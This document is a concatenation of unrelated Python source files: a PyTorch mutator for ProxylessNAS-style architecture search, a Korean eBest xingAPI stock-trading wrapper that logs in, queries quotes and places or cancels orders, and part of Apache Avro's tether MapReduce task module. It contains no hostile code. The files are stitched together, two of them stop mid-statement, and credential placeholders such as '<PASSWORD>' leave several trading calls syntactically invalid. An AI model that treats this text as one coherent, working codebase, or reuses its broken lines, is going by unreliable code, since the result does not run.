<gh_stars>10-100 import math import numpy as np import torch from torch import nn as nn from torch.nn import functional as F from lib.mutables.spaces import OperationSpace from .base_mutator import BaseMutator from .default_mutator import Mutator __all__ = [ 'ProxylessMutator', ] def detach_variable(inputs): """ Detach variables Parameters ---------- inputs : pytorch tensors pytorch tensors """ if isinstance(inputs, tuple): return tuple([detach_variable(x) for x in inputs]) else: x = inputs.detach() x.requires_grad = inputs.requires_grad return x class ArchGradientFunction(torch.autograd.Function): @staticmethod def forward(ctx, x, binary_gates, run_func, backward_func): ctx.run_func = run_func ctx.backward_func = backward_func detached_x = detach_variable(x) with torch.enable_grad(): output = run_func(detached_x) ctx.save_for_backward(detached_x, output) return output.data @staticmethod def backward(ctx, grad_output): detached_x, output = ctx.saved_tensors grad_x = torch.autograd.grad(output, detached_x, grad_output, only_inputs=True) # compute gradients w.r.t. binary_gates binary_grads = ctx.backward_func(detached_x.data, output.data, grad_output.data) return grad_x[0], binary_grads, None, None class MixedOp(nn.Module): """ This class is to instantiate and manage info of one OperationSpace. It includes architecture weights, binary weights, and member functions operating the weights. forward_mode: forward/backward mode for OperationSpace: None, two, full, and full_v2. For training architecture weights, we use full_v2 by default, and for training model weights, we use None. """ forward_mode = None def __init__(self, mutable): """ Parameters ---------- mutable : OperationSpace A OperationSpace in user model """ super(MixedOp, self).__init__() self.ap_path_alpha = nn.Parameter(torch.Tensor(mutable.length)) self.ap_path_wb = nn.Parameter(torch.Tensor(mutable.length)) self.ap_path_alpha.requires_grad = False self.ap_path_wb.requires_grad = False self.active_index = [0] self.inactive_index = None self.log_prob = None self.current_prob_over_ops = None self.n_choices = mutable.length def get_ap_path_alpha(self): return self.ap_path_alpha def to_requires_grad(self): self.ap_path_alpha.requires_grad = True self.ap_path_wb.requires_grad = True def to_disable_grad(self): self.ap_path_alpha.requires_grad = False self.ap_path_wb.requires_grad = False def forward(self, mutable, x): """ Define forward of OperationSpace. For 'full_v2', backward is also defined. The 'two' mode is explained in section 3.2.1 in the paper. The 'full_v2' mode is explained in Appendix D in the paper. 
Parameters ---------- mutable : OperationSpace this layer's mutable x : tensor inputs of this layer, only support one input Returns ------- output: tensor output of this layer """ if MixedOp.forward_mode == 'full' or MixedOp.forward_mode == 'two': output = 0 for _i in self.active_index: oi = self.candidate_ops[_i](x) output = output + self.ap_path_wb[_i] * oi for _i in self.inactive_index: oi = self.candidate_ops[_i](x) output = output + self.ap_path_wb[_i] * oi.detach() elif MixedOp.forward_mode == 'full_v2': def run_function(key, candidate_ops, active_id): def forward(_x): return candidate_ops[active_id](_x) return forward def backward_function(key, candidate_ops, active_id, binary_gates): def backward(_x, _output, grad_output): binary_grads = torch.zeros_like(binary_gates.data) with torch.no_grad(): for k in range(len(candidate_ops)): if k != active_id: out_k = candidate_ops[k](_x.data) else: out_k = _output.data grad_k = torch.sum(out_k * grad_output) binary_grads[k] = grad_k return binary_grads return backward output = ArchGradientFunction.apply( x, self.ap_path_wb, run_function(mutable.key, mutable.candidates, self.active_index[0]), backward_function(mutable.key, mutable.candidates, self.active_index[0], self.ap_path_wb)) else: output = self.active_op(mutable)(x) return output @property def probs_over_ops(self): """ Apply softmax on alpha to generate probability distribution Returns ------- pytorch tensor probability distribution """ probs = F.softmax(self.ap_path_alpha, dim=0) # softmax to probability return probs @property def chosen_index(self): """ choose the op with max prob Returns ------- int index of the chosen one numpy.float32 prob of the chosen one """ probs = self.probs_over_ops.data.cpu().numpy() index = int(np.argmax(probs)) return index, probs[index] def active_op(self, mutable): """ assume only one path is active Returns ------- PyTorch module the chosen operation """ return mutable.candidates[self.active_index[0]] @property def active_op_index(self): """ return active op's index, the active op is sampled Returns ------- int index of the active op """ return self.active_index[0] def set_chosen_op_active(self): """ set chosen index, active and inactive indexes """ chosen_idx, _ = self.chosen_index self.active_index = [chosen_idx] self.inactive_index = [_i for _i in range(0, chosen_idx)] + \ [_i for _i in range(chosen_idx + 1, self.n_choices)] def binarize(self, mutable): """ Sample based on alpha, and set binary weights accordingly. ap_path_wb is set in this function, which is called binarize. 
Parameters ---------- mutable : OperationSpace this layer's mutable """ self.log_prob = None # reset binary gates self.ap_path_wb.data.zero_() probs = self.probs_over_ops if MixedOp.forward_mode == 'two': # sample two ops according to probs sample_op = torch.multinomial(probs.data, 2, replacement=False) probs_slice = F.softmax(torch.stack([ self.ap_path_alpha[idx] for idx in sample_op ]), dim=0) self.current_prob_over_ops = torch.zeros_like(probs) for i, idx in enumerate(sample_op): self.current_prob_over_ops[idx] = probs_slice[i] # choose one to be active and the other to be inactive according to probs_slice c = torch.multinomial(probs_slice.data, 1)[0] # 0 or 1 active_op = sample_op[c].item() inactive_op = sample_op[1-c].item() self.active_index = [active_op] self.inactive_index = [inactive_op] # set binary gate self.ap_path_wb.data[active_op] = 1.0 else: sample = torch.multinomial(probs, 1)[0].item() self.active_index = [sample] self.inactive_index = [_i for _i in range(0, sample)] + \ [_i for _i in range(sample + 1, len(mutable.candidates))] self.log_prob = torch.log(probs[sample]) self.current_prob_over_ops = probs self.ap_path_wb.data[sample] = 1.0 # avoid over-regularization for choice in mutable.candidates: for _, param in choice.named_parameters(): param.grad = None @staticmethod def delta_ij(i, j): if i == j: return 1 else: return 0 def set_arch_param_grad(self, mutable): """ Calculate alpha gradient for this OperationSpace. It is calculated using gradient of binary gate, probs of ops. """ binary_grads = self.ap_path_wb.grad.data if self.active_op(mutable).is_zero_layer(): self.ap_path_alpha.grad = None return if self.ap_path_alpha.grad is None: self.ap_path_alpha.grad = torch.zeros_like(self.ap_path_alpha.data) if MixedOp.forward_mode == 'two': involved_idx = self.active_index + self.inactive_index probs_slice = F.softmax(torch.stack([ self.ap_path_alpha[idx] for idx in involved_idx ]), dim=0).data for i in range(2): for j in range(2): origin_i = involved_idx[i] origin_j = involved_idx[j] self.ap_path_alpha.grad.data[origin_i] += \ binary_grads[origin_j] * probs_slice[j] * (MixedOp.delta_ij(i, j) - probs_slice[i]) for _i, idx in enumerate(self.active_index): self.active_index[_i] = (idx, self.ap_path_alpha.data[idx].item()) for _i, idx in enumerate(self.inactive_index): self.inactive_index[_i] = (idx, self.ap_path_alpha.data[idx].item()) else: probs = self.probs_over_ops.data for i in range(self.n_choices): for j in range(self.n_choices): self.ap_path_alpha.grad.data[i] += binary_grads[j] * probs[j] * (MixedOp.delta_ij(i, j) - probs[i]) return def rescale_updated_arch_param(self): """ rescale architecture weights for the 'two' mode. """ if not isinstance(self.active_index[0], tuple): assert self.active_op.is_zero_layer() return involved_idx = [idx for idx, _ in (self.active_index + self.inactive_index)] old_alphas = [alpha for _, alpha in (self.active_index + self.inactive_index)] new_alphas = [self.ap_path_alpha.data[idx] for idx in involved_idx] offset = math.log( sum([math.exp(alpha) for alpha in new_alphas]) / sum([math.exp(alpha) for alpha in old_alphas]) ) for idx in involved_idx: self.ap_path_alpha.data[idx] -= offset class ProxylessMutator(Mutator): """ This mutator initializes and operates all the LayerChoices of the input model. It is for the corresponding trainer to control the training process of LayerChoices, coordinating with whole training process. """ def __init__(self, model): """ Init a MixedOp instance for each mutable i.e., OperationSpace. 
And register the instantiated MixedOp in corresponding OperationSpace. If does not register it in OperationSpace, DataParallel does not work then, because architecture weights are not included in the DataParallel model. When MixedOPs are registered, we use ```requires_grad``` to control whether calculate gradients of architecture weights. Parameters ---------- model : pytorch model The model that users want to tune, it includes search space defined with nas apis """ super(ProxylessMutator, self).__init__(model) self._unused_modules = None self.mutable_list = [] for mutable in self.undedup_mutables: self.mutable_list.append(mutable) mutable.registered_module = MixedOp(mutable) def on_forward_operation_space(self, mutable, *args, **kwargs): """ Callback of layer choice forward. This function defines the forward logic of the input mutable. So mutable is only interface, its real implementation is defined in mutator. Parameters ---------- mutable: OperationSpace forward logic of this input mutable args: list of torch.Tensor inputs of this mutable kwargs: dict inputs of this mutable Returns ------- torch.Tensor output of this mutable, i.e., OperationSpace int index of the chosen op """ # FIXME: return mask, to be consistent with other algorithms idx = mutable.registered_module.active_op_index return mutable.registered_module(mutable, *args, **kwargs), idx def reset_binary_gates(self): """ For each OperationSpace, binarize binary weights based on alpha to only activate one op. It traverses all the mutables in the model to do this. """ for mutable in self.undedup_mutables: mutable.registered_module.binarize(mutable) def set_chosen_op_active(self): """ For each OperationSpace, set the op with highest alpha as the chosen op. Usually used for validation. """ for mutable in self.undedup_mutables: mutable.registered_module.set_chosen_op_active() def num_arch_params(self): """ The number of mutables, i.e., OperationSpace Returns ------- int the number of OperationSpace in user model """ return len(self.mutable_list) def set_arch_param_grad(self): """ For each OperationSpace, calculate gradients for architecture weights, i.e., alpha """ for mutable in self.undedup_mutables: mutable.registered_module.set_arch_param_grad(mutable) def get_architecture_parameters(self): """ Get all the architecture parameters. yield ----- PyTorch Parameter Return ap_path_alpha of the traversed mutable """ for mutable in self.undedup_mutables: yield mutable.registered_module.get_ap_path_alpha() def change_forward_mode(self, mode): """ Update
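# --- Added standalone sketch (numeric check, not part of the mutator above) ---
# MixedOp.set_arch_param_grad() implements, per OperationSpace,
#     dL/d(alpha_i) = sum_j binary_grad_j * p_j * (delta_ij - p_i),  p = softmax(alpha)
# which can be reproduced in isolation:
import torch
import torch.nn.functional as F

alpha = torch.tensor([0.1, -0.3, 0.5])          # architecture weights of one layer
binary_grads = torch.tensor([0.2, -0.1, 0.05])  # gradients w.r.t. the binary gates
p = F.softmax(alpha, dim=0)
alpha_grad = torch.zeros_like(alpha)
for i in range(len(alpha)):
    for j in range(len(alpha)):
        delta_ij = 1.0 if i == j else 0.0
        alpha_grad[i] += binary_grads[j] * p[j] * (delta_ij - p[i])
print(alpha_grad)                                # same numbers set_arch_param_grad would accumulate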
<reponame>hopelife/mstb import os, sys import configparser import win32com.client import pythoncom from datetime import datetime import time class XASession: #로그인 상태를 확인하기 위한 클래스변수 login_state = 0 def OnLogin(self, code, msg): """ 로그인 시도 후 호출되는 이벤트. code가 0000이면 로그인 성공 """ if code == "0000": print(code, msg) XASession.login_state = 1 else: print(code, msg) def OnDisconnect(self): """ 서버와 연결이 끊어지면 발생하는 이벤트 """ print("Session disconntected") XASession.login_state = 0 class XAQuery: # RES_PATH ="C:\\eBEST\\xingAPI\\Res\\" config = configparser.ConfigParser() config.read(os.path.join(os.path.dirname(__file__), 'conf', 'config.ini')) RES_PATH = config['PATH']['ebest_res'] tr_run_state = 0 def OnReceiveData(self, code): print("OnReceiveData", code) XAQuery.tr_run_state = 1 def OnReceiveMessage(self, error, code, message): print("OnReceiveMessage", error, code, message, XAQuery.tr_run_state) class EBest: QUERY_LIMIT_10MIN = 200 LIMIT_SECONDS = 600 #10min def __init__(self, mode=None): """ config.ini 파일을 로드해 사용자, 서버정보 저장 query_cnt는 10분당 200개 TR 수행을 관리하기 위한 리스트 xa_session_client는 XASession 객체 :param mode:str - 모의서버는 DEMO 실서버는 PROD로 구분 """ if mode not in ["PROD", "DEMO", "ACE"]: raise Exception("Need to run_mode(PROD or DEMO or ACE)") run_mode = "EBEST_" + mode # config = configparser.ConfigParser() config = configparser.RawConfigParser() config.read(os.path.join(os.path.dirname(__file__), 'conf', 'config.ini')) self.user = config[run_mode]['user'] self.passwd = config[run_mode]['password'] self.cert_passwd = config[run_mode]['cert_passwd'] self.host = config[run_mode]['host'] self.port = config[run_mode]['port'] self.account = config[run_mode]['account'] self.xa_session_client = win32com.client.DispatchWithEvents("XA_Session.XASession", XASession) self.query_cnt = [] def login(self): self.xa_session_client.ConnectServer(self.host, self.port) self.xa_session_client.Login(self.user, self.passwd, self.cert_passwd, 0, 0) while XASession.login_state == 0: pythoncom.PumpWaitingMessages() def logout(self): XASession.login_state = 0 self.xa_session_client.DisconnectServer() def _execute_query(self, res, in_block_name, out_block_name, *out_fields, **set_fields): """TR코드를 실행하기 위한 메소드입니다. :param res:str 리소스명(TR) :param in_block_name:str 인블록명 :param out_blcok_name:str 아웃블록명 :param out_params:list 출력필드 리스트 :param in_params:dict 인블록에 설정할 필드 딕셔너리 :return result:list 결과를 list에 담아 반환 """ time.sleep(1) print("current query cnt:", len(self.query_cnt)) print(res, in_block_name, out_block_name) while len(self.query_cnt) >= EBest.QUERY_LIMIT_10MIN: time.sleep(1) print("waiting for execute query... 
current query cnt:", len(self.query_cnt)) self.query_cnt = list(filter(lambda x: (datetime.today() - x).total_seconds() < EBest.LIMIT_SECONDS, self.query_cnt)) xa_query = win32com.client.DispatchWithEvents("XA_DataSet.XAQuery", XAQuery) xa_query.LoadFromResFile(XAQuery.RES_PATH + res+".res") #in_block_name 셋팅 for key, value in set_fields.items(): xa_query.SetFieldData(in_block_name, key, 0, value) errorCode = xa_query.Request(0) #요청 후 대기 waiting_cnt = 0 while xa_query.tr_run_state == 0: waiting_cnt +=1 if waiting_cnt % 1000000 == 0 : print("Waiting....", self.xa_session_client.GetLastError()) pythoncom.PumpWaitingMessages() #결과블럭 result = [] count = xa_query.GetBlockCount(out_block_name) for i in range(count): item = {} for field in out_fields: value = xa_query.GetFieldData(out_block_name, field, i) item[field] = value result.append(item) """ print("IsNext?", xa_query.IsNext) while xa_query.IsNext == True: time.sleep(1) errorCode = xa_query.Request(1) print("errorCode", errorCode) if errorCode < 0: break count = xa_query.GetBlockCount(out_block_name) print("count", count) if count == 0: break for i in range(count): item = {} for field in out_fields: value = xa_query.GetFieldData(out_block_name, field, i) item[field] = value print(item) result.append(item) """ XAQuery.tr_run_state = 0 self.query_cnt.append(datetime.today()) #영문필드를 한글필드명으로 변환 for item in result: for field in list(item.keys()): if getattr(Field, res, None): res_field = getattr(Field, res, None) if out_block_name in res_field: field_hname = res_field[out_block_name] if field in field_hname: item[field_hname[field]] = item[field] item.pop(field) return result def get_code_list(self, market=None): """TR: t8436 코스피, 코스닥의 종목 리스트를 가져온다 :param market:str 전체(0), 코스피(1), 코스닥(2) :return result:list 시장 별 종목 리스트 """ if market not in ["ALL", "KOSPI", "KOSDAQ"]: raise Exception("Need to market param(ALL, KOSPI, KOSDAQ)") market_code = {"ALL":"0", "KOSPI":"1", "KOSDAQ":"2"} in_params = {"gubun":market_code[market]} out_params =['hname', 'shcode', 'expcode', 'etfgubun', 'memedan', 'gubun', 'spac_gubun'] result = self._execute_query("t8436", "t8436InBlock", "t8436OutBlock", *out_params, **in_params) return result def get_stock_price_by_code(self, code=None, cnt="1"): """TR: t1305 현재 날짜를 기준으로 cnt 만큼 전일의 데이터를 가져온다 :param code:str 종목코드 :param cnt:str 데이터 범위 :return result:list 종목의 최근 가격 정보 """ tr_code = "t1305" in_params = {"shcode":code, "dwmcode": "1", "date":"", "idx":"", "cnt":cnt} out_params =['date', 'open', 'high', 'low', 'close', 'sign', 'change', 'diff', 'volume', 'diff_vol', 'chdegree', 'sojinrate', 'changerate', 'fpvolume', 'covolume', 'value', 'ppvolume', 'o_sign', 'o_change', 'o_diff', 'h_sign', 'h_change', 'h_diff', 'l_sign', 'l_change', 'l_diff', 'marketcap'] #t8413 #in_params = {"shcode":code, "qrycnt": "1", "gubun":"2", "sdate":start, "cts_date":"", "edate":end, "comp_yn":"N"} #out_params =['date', 'open', 'high', 'low', 'close', 'jdiff_vol', 'sign'] result = self._execute_query("t1305", "t1305InBlock", "t1305OutBlock1", *out_params, **in_params) for item in result: item["code"] = code return result def get_credit_trend_by_code(self, code=None, date=None): """TR: t1921 신용거래동향 :param code:str 종목코드 :param date:str 날짜 8자리 ex) 20190222 """ in_params = {"gubun":"0", "shcode":code, "date":date, "idx":"0"} out_params =["mmdate", "close", "sign", "jchange", "diff", "nvolume", "svolume", "jvolume", "price", "change", "gyrate", "jkrate" "shcode"] result = self._execute_query("t1921", "t1921InBlock", "t1921OutBlock1", *out_params, 
**in_params) for item in result: item["code"] = code return result def get_agent_trend_by_code(self, code=None ,fromdt=None, todt=None): """TR: t1717 외인기관별 종목별 동향 :param code:str 종목코드 :param fromdt:str 조회 시작 날짜 :param todt:str 조회 종료 날짜 :return result:list 시장 별 종목 리스트 """ in_params = {"gubun":"0", "fromdt":fromdt, "todt":todt, "shcode":code} out_params =["date", "close", "sign", "change", "diff", "volume", "tjj0000_vol", "tjj0001_vol", "tjj0002_vol", "tjj0003_vol", "tjj0004_vol", "tjj0005_vol","tjj0006_vol", "tjj0007_vol", "tjj0008_vol", "tjj0009_vol", "tjj0010_vol", "tjj0011_vol", "tjj0018_vol", "tjj0016_vol", "tjj0017_vol", "tjj0001_dan", "tjj0002_dan", "tjj0003_dan", "tjj0004_dan", "tjj0005_dan", "tjj0006_dan", "tjj0007_dan", "tjj0008_dan", "tjj0009_dan", "tjj0010_dan", "tjj0011_dan", "tjj0018_dan", "tjj0016_dan", "tjj0017_dan" ] result = self._execute_query("t1717", "t1717InBlock", "t1717OutBlock", *out_params, **in_params) for item in result: item["code"] = code return result def get_short_trend_by_code(self, code=None, sdate=None, edate=None): """TR: t1927 공매도일별추이 :param code:str 종목코드 :param sdate:str 시작일자 :param edate:str 종료일자 :return result:list 시장 별 종목 리스트 """ in_params = {"date":sdate, "sdate":sdate, "edate":edate, "shcode":code} out_params =["date", "price", "sign", "change", "diff", "volume", "value", "gm_vo", "gm_va", "gm_per", "gm_avg", "gm_vo_sum"] result = self._execute_query("t1927", "t1927InBlock", "t1927OutBlock1", *out_params, **in_params) for item in result: item["code"] = code return result def get_account_info(self): """TR: CSPAQ12200 현물계좌 예수금/주문가능금액/총평가 :return result:list Field CSPAQ12200 참고 """ in_params = {"RecCnt":"1", "AcntNo": self.account, "Pwd": <PASSWORD>} out_params =["MnyOrdAbleAmt", "BalEvalAmt", "DpsastTotamt", "InvstOrgAmt", "InvstPlAmt", "Dps"] result = self._execute_query("CSPAQ12200", "CSPAQ12200InBlock1", "CSPAQ12200OutBlock2", *out_params, **in_params) return result def get_account_stock_info(self): """TR: CSPAQ12300 현물계좌 잔고내역 조회 :return result:list 계좌 보유 종목 정보 """ in_params = {"RecCnt": "1", "AcntNo": self.account, "Pwd": <PASSWORD>, "BalCreTp": "0", "CmsnAppTpCode": "0", "D2balBaseQryTp": "0", "UprcTpCode": "0"} out_params =["IsuNo", "IsuNm", "BnsBaseBalQty", "SellPrc", "BuyPrc", "NowPrc", "AvrUprc", "PnlRat", "BalEvalAmt"] result = self._execute_query("CSPAQ12300", "CSPAQ12300InBlock1", "CSPAQ12300OutBlock3", *out_params, **in_params) def order_stock(self, code, qty, price, bns_type, order_type="00"): """TR: CSPAT00600 현물 정상 주문 :param bns_type:str 매매타입, 1:매도, 2:매수 :prarm order_type:str 호가유형, 00:지정가, 03:시장가, 05:조건부지정가, 07:최우선지정가 61:장개시전시간외 종가, 81:시간외종가, 82:시간외단일가 :return result:dict 주문 관련정보 """ in_params = {"AcntNo":self.account, "InptPwd":<PASSWORD>, "IsuNo":code, "OrdQty":qty, "OrdPrc":price, "BnsTpCode":bns_type, "OrdprcPtnCode":order_type, "MgntrnCode":"000", "LoanDt":"", "OrdCndiTpCode":"0"} out_params = ["OrdNo", "OrdTime", "OrdMktCode", "OrdPtnCode", "ShtnIsuNo", "MgempNo", "OrdAmt", "SpotOrdQty", "IsuNm"] result = self._execute_query("CSPAT00600", "CSPAT00600InBlock1", "CSPAT00600OutBlock2", *out_params, **in_params) return result def order_cancel(self, order_no, code, qty): """TR: CSPAT00800 현물 취소주문 :param order_no:str 주문번호 :param code:str 종목코드 :param qty:str 취소 수량 :return result:dict 취소 결과 """ in_params = {"OrgOrdNo":order_no,"AcntNo":self.account, "InptPwd":self.passwd, "IsuNo":code, "OrdQty":qty} out_params = ["OrdNo", "PrntOrdNo", "OrdTime", "OrdPtnCode", "ShtnIsuNo", "IsuNm"] result = self._execute_query("CSPAT00800", 
"CSPAT00800InBlock1", "CSPAT00800OutBlock2", *out_params, **in_params) return result def order_check(self, order_no=None): """TR: t0425 주식 체결/미체결 :param code:str 종목코드 :param order_no:str 주문번호 :return result:dict 주문번호의 체결상태 """ in_params = {"accno": self.account, "passwd": <PASSWORD>, "expcode": "", "chegb":"0", "medosu":"0", "sortgb":"1", "cts_ordno":" "} out_params = ["ordno", "expcode", "medosu", "qty", "price", "cheqty", "cheprice", "ordrem", "cfmqty", "status", "orgordno", "ordgb", "ordermtd", "sysprocseq", "hogagb", "price1", "orggb", "singb", "loandt"] result_list = self._execute_query("t0425", "t0425InBlock", "t0425OutBlock1", *out_params, **in_params) result = {} if order_no is not None: for item in result_list: if item["주문번호"] == order_no: result = item return result else: return result_list def order_check2(self, date, code, order_no=None): #CSPAQ13700 print("get_order_check, ", order_no) in_params = {"RecCnt":"1", "AcntNo":self.account, "InptPwd":<PASSWORD>.passwd, "OrdMktCode":"00", "BnsTpCode":"0", "IsuNo":code, "ExecYn":"0", "OrdDt":date, "SrtOrdNo2":"0", "BkseqTpCode":"0", "OrdPtnCode":"00"} out_params_3 = ["OrdDt", "OrdMktCode", "OrdNo", "OrgOrdNo", "IsuNo", "IsuNm", "BnsTpCode", "BnsTpNm", "OrdPtnCode", "OrdPtnNm", "MrcTpCode", "OrdQty", "OrdPrc", "ExecQty", "ExecPrc", "LastExecTime", "OrdprcPtnCode", "OrdprcPtnNm", "AllExecQty", "OrdTime"] result_list = self._execute_query("CSPAQ13700", "CSPAQ13700InBlock1", "CSPAQ13700OutBlock3", *out_params_3, **in_params) result = {} print("get_order_check result len", len(result_list)) if order_no is not None: for item in result_list: if item["주문번호"] == order_no: result = item return result else: return result_list def get_current_call_price_by_code(self, code=None): """TR: t1101 주식 현재가 호가 조회 :param code:str 종목코드 """ tr_code = "t1101" in_params = {"shcode": code} out_params =["hname", "price", "sign", "change", "diff", "volume", "jnilclose", "offerho1","bidho1", "offerrem1", "bidrem1", "offerho2","bidho2", "offerrem2", "bidrem2", "offerho3","bidho3", "offerrem3", "bidrem3", "offerho4","bidho4", "offerrem4", "bidrem4", "offerho5","bidho5", "offerrem5", "bidrem5", "offerho6","bidho6", "offerrem6", "bidrem6", "offerho7","bidho7", "offerrem7", "bidrem7", "offerho8","bidho8", "offerrem8", "bidrem8", "offerho9","bidho9", "offerrem9", "bidrem9", "offerho10","bidho10", "offerrem10", "bidrem10", "preoffercha10", "prebidcha10", "offer", "bid", "preoffercha", "prebidcha", "hotime", "yeprice", "yevolume", "yesign", "yechange", "yediff", "tmoffer", "tmbid", "ho_status", "shcode", "uplmtprice", "dnlmtprice", "open", "high", "low"] result = self._execute_query("t1101", "t1101InBlock", "t1101OutBlock", *out_params, **in_params) for item in result: item["code"] =
#!/usr/bin/env python3 # -*- mode: python -*- # -*- coding: utf-8 -*- ## # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import abc import collections import io import logging import os import sys import threading import traceback import avro.errors import avro.io import avro.ipc import avro.protocol import avro.schema __all__ = ["TetherTask", "TaskType", "inputProtocol", "outputProtocol", "HTTPRequestor"] # create protocol objects for the input and output protocols # The build process should copy InputProtocol.avpr and OutputProtocol.avpr # into the same directory as this module TaskType = None pfile = os.path.split(__file__)[0] + os.sep + "InputProtocol.avpr" with open(pfile, 'r') as hf: prototxt = hf.read() inputProtocol = avro.protocol.parse(prototxt) # use a named tuple to represent the tasktype enumeration taskschema = inputProtocol.types_dict["TaskType"] # Mypy cannot statically type check a dynamically constructed named tuple. # Since InputProtocol.avpr is hard-coded here, we can hard-code the symbols. _ttype = collections.namedtuple("_ttype", ("MAP", "REDUCE")) TaskType = _ttype(*taskschema.symbols) pfile = os.path.split(__file__)[0] + os.sep + "OutputProtocol.avpr" with open(pfile, 'r') as hf: prototxt = hf.read() outputProtocol = avro.protocol.parse(prototxt) class Collector: """ Collector for map and reduce output values """ def __init__(self, scheme, outputClient): """ Parameters --------------------------------------------- scheme - The scheme for the datums to output - can be a json string - or an instance of Schema outputClient - The output client used to send messages to the parent """ if not isinstance(scheme, avro.schema.Schema): scheme = avro.schema.parse(scheme) self.scheme = scheme self.datum_writer = avro.io.DatumWriter(writers_schema=self.scheme) self.outputClient = outputClient def collect(self, record, partition=None): """Collect a map or reduce output value Parameters ------------------------------------------------------ record - The record to write partition - Indicates the partition for a pre-partitioned map output - currently not supported """ # Replace the encoder and buffer every time we collect. with io.BytesIO() as buff: self.encoder = avro.io.BinaryEncoder(buff) self.datum_writer.write(record, self.encoder) value = buff.getvalue() datum = {"datum": value} if partition is not None: datum["partition"] = partition self.outputClient.request("output", datum) def keys_are_equal(rec1, rec2, fkeys): """Check if the "keys" in two records are equal. The key fields are all fields for which order isn't marked ignore. 
Parameters ------------------------------------------------------------------------- rec1 - The first record rec2 - The second record fkeys - A list of the fields to compare """ for f in fkeys: if not(rec1[f] == rec2[f]): return False return True class HTTPRequestor: """ This is a small requestor subclass I created for the HTTP protocol. Since the HTTP protocol isn't persistent, we need to instantiate a new transciever and new requestor for each request. But I wanted to use of the requestor to be identical to that for SocketTransciever so that we can seamlessly switch between the two. """ def __init__(self, server, port, protocol): """ Instantiate the class. Parameters ---------------------------------------------------------------------- server - The server hostname port - Which port to use protocol - The protocol for the communication """ self.server = server self.port = port self.protocol = protocol def request(self, *args, **param): transciever = avro.ipc.HTTPTransceiver(self.server, self.port) requestor = avro.ipc.Requestor(self.protocol, transciever) return requestor.request(*args, **param) class TetherTask(abc.ABC): """ Base class for python tether mapreduce programs. ToDo: Currently the subclass has to implement both reduce and reduceFlush. This is not very pythonic. A pythonic way to implement the reducer would be to pass the reducer a generator (as dumbo does) so that the user could iterate over the records for the given key. How would we do this. I think we would need to have two threads, one thread would run the user's reduce function. This loop would be suspended when no reducer records were available. The other thread would read in the records for the reducer. This thread should only buffer so many records at a time (i.e if the buffer is full, self.input shouldn't return right away but wait for space to free up) """ def __init__(self, inschema, midschema, outschema): """ Parameters --------------------------------------------------------- inschema - The scheme for the input to the mapper midschema - The scheme for the output of the mapper outschema - The scheme for the output of the reducer An example scheme for the prototypical word count example would be inscheme='{"type":"record", "name":"Pair","namespace":"org.apache.avro.mapred","fields":[ {"name":"key","type":"string"}, {"name":"value","type":"long","order":"ignore"}] }' Important: The records are split into (key,value) pairs as required by map reduce by using all fields with "order"=ignore for the key and the remaining fields for the value. The subclass provides these schemas in order to tell this class which schemas it expects. The configure request will also provide the schemas that the parent process is using. This allows us to check whether the schemas match and if not whether we can resolve the differences (see https://avro.apache.org/docs/current/spec.html#Schema+Resolution)) """ # make sure we can parse the schemas # Should we call fail if we can't parse the schemas? 
self.inschema = avro.schema.parse(inschema) self.midschema = avro.schema.parse(midschema) self.outschema = avro.schema.parse(outschema) # declare various variables self.clienTransciever = None # output client is used to communicate with the parent process # in particular to transmit the outputs of the mapper and reducer self.outputClient = None # collectors for the output of the mapper and reducer self.midCollector = None self.outCollector = None self._partitions = None # cache a list of the fields used by the reducer as the keys # we need the fields to decide when we have finished processing all values for # a given key. We cache the fields to be more efficient self._red_fkeys = None # We need to keep track of the previous record fed to the reducer # b\c we need to be able to determine when we start processing a new group # in the reducer self.midRecord = None # create an event object to signal when # http server is ready to be shutdown self.ready_for_shutdown = threading.Event() self.log = logging.getLogger("TetherTask") def open(self, inputport, clientPort=None): """Open the output client - i.e the connection to the parent process Parameters --------------------------------------------------------------- inputport - This is the port that the subprocess is listening on. i.e the subprocess starts a server listening on this port to accept requests from the parent process clientPort - The port on which the server in the parent process is listening - If this is None we look for the environment variable AVRO_TETHER_OUTPUT_PORT - This is mainly provided for debugging purposes. In practice we want to use the environment variable """ # Open the connection to the parent process # The port the parent process is listening on is set in the environment # variable AVRO_TETHER_OUTPUT_PORT # open output client, connecting to parent clientPort = int(clientPort or os.getenv("AVRO_TETHER_OUTPUT_PORT", 0)) if clientPort == 0: raise avro.errors.UsageError("AVRO_TETHER_OUTPUT_PORT env var is not set") self.log.info("TetherTask.open: Opening connection to parent server on port={0}".format(clientPort)) # self.outputClient = avro.ipc.Requestor(outputProtocol, self.clientTransceiver) # since HTTP is stateless, a new transciever # is created and closed for each request. We therefore set clientTransciever to None # We still declare clientTransciever because for other (state) protocols we will need # it and we want to check when we get the message fail whether the transciever # needs to be closed. # self.clientTranciever=None self.outputClient = HTTPRequestor("127.0.0.1", clientPort, outputProtocol) try: self.outputClient.request('configure', {"port": inputport}) except Exception: estr = traceback.format_exc() self.fail(estr) def configure(self, taskType, inSchemaText, outSchemaText): """ Parameters ------------------------------------------------------------------- taskType - What type of task (e.g map, reduce) - This is an enumeration which is specified in the input protocol inSchemaText - string containing the input schema - This is the actual schema with which the data was encoded i.e it is the writer_schema (see https://avro.apache.org/docs/current/spec.html#Schema+Resolution) This is the schema the parent process is using which might be
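# --- Added standalone sketch (mirrors what Collector.collect does above) ---
# Each collected record is Avro-binary-encoded into an in-memory buffer before it
# is sent to the parent as {"datum": <bytes>}; the schema is the word-count Pair
# record quoted in the TetherTask docstring.
import io
import avro.io
import avro.schema

pair_schema = avro.schema.parse(
    '{"type":"record","name":"Pair","namespace":"org.apache.avro.mapred",'
    '"fields":[{"name":"key","type":"string"},'
    '{"name":"value","type":"long","order":"ignore"}]}')
datum_writer = avro.io.DatumWriter(writers_schema=pair_schema)
with io.BytesIO() as buff:
    encoder = avro.io.BinaryEncoder(buff)
    datum_writer.write({"key": "hello", "value": 1}, encoder)
    payload = buff.getvalue()
print(len(payload), "bytes ready to send as the 'datum' field")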
